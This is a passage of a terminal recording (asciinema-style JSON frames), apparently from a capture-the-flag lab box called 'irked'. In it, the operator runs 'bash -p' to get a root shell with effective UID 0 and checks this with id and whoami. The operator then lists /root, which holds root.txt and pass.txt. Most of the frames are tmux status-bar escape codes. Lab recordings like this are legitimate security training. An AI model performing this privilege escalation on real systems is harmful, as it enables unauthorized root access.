[70.676605, "o", "a"]
[70.73841, "o", "s"]
[70.820025, "o", "h"]
[70.956486, "o", " "]
[71.039567, "o", "-"]
[71.211514, "o", "p"]
[71.325315, "o", "\r\n"]
[71.362055, "o", "rootbash-4.3# "]
[71.543476, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:56 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[37;15H"]
[72.002478, "o", "i"]
[72.149271, "o", "d"]
[72.220979, "o", ";"]
[72.446479, "o", "w"]
[72.547401, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:57 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[37;19H"]
[72.558964, "o", "h"]
[72.624777, "o", "o"]
[72.721389, "o", "a"]
[72.824934, "o", "m"]
[72.908441, "o", "i"]
[73.088351, "o", "\r\n"]
[73.125328, "o", "uid=1001(ircd) gid=1001(ircd) euid=0(root) groups=1001(ircd)\r\nroot\r\nrootbash-4.3# "]
[73.481548, "o", "c"]
[73.547318, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:58 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[40;16H"]
[73.555315, "o", "d"]
[73.715947, "o", " "]
[74.035377, "o", "/"]
[74.182349, "o", "r"]
[74.286869, "o", "o"]
[74.4528, "o", "o"]
[74.522155, "o", "t"]
[74.548598, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:59 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[40;23H"]
[74.603615, "o", "\r\nrootbash-4.3# "]
[75.549034, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:36:00 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[41;15H"]
[75.642442, "o", "l"]
[75.67964, "o", "s"]
[75.825412, "o", " "]
[76.278269, "o", "-"]
[76.355245, "o", "l"]
[76.39785, "o", "a"]
[76.494839, "o", "\r\n"]
[76.531747, "o", "total 24\r\ndrwx------  2 root root 4096 Sep  5 08:41 .\r\ndrwxr-xr-x 21 root root 4096 Sep  8 11:55 ..\r\nlrwxrwxrwx  1 root root    9 Nov  3  2018 .bash_history -> /dev/null\r\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\r\n-rw-r--r--  1 root root   17 May 14  2018 pass.txt\r\n-rw-r--r--  1 root root  140 Nov 19  2007 .profile\r\n-rw-r-----  1 root root   33 Sep  9 17:41 root.txt\r\nrootbash-4.3# "]
[76.55185, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:36:01 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[50;15H"]
[77.554826, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:36:02 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[50;15H"]
[77.835545, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:36:03 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[50;15H"]
[78.645435, "o", "\u001b[1;83r\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b[?7727l\u001b[?1004l\u001b[?1049l\u001b[23;0;0t"]
[78.645656, "o", "[detached (from session irked)]\r\n"]
[78.646122, "o", "\u001b[?2004h\u001b]0;root@kali: ~/tmux/tmux-power\u0007\u001b[1;37m┌──(\u001b[1;34mroot💀kali\u001b[1;37m)-[\u001b[0;1m~/tmux/tmux-power\u001b[1;37m]\r\r\n\u001b[1;37m└─\u001b[1;34m#\u001b[0m "]
[79.645262, "o", "\u001b[?2004l\r\r\nexit\r\n"]
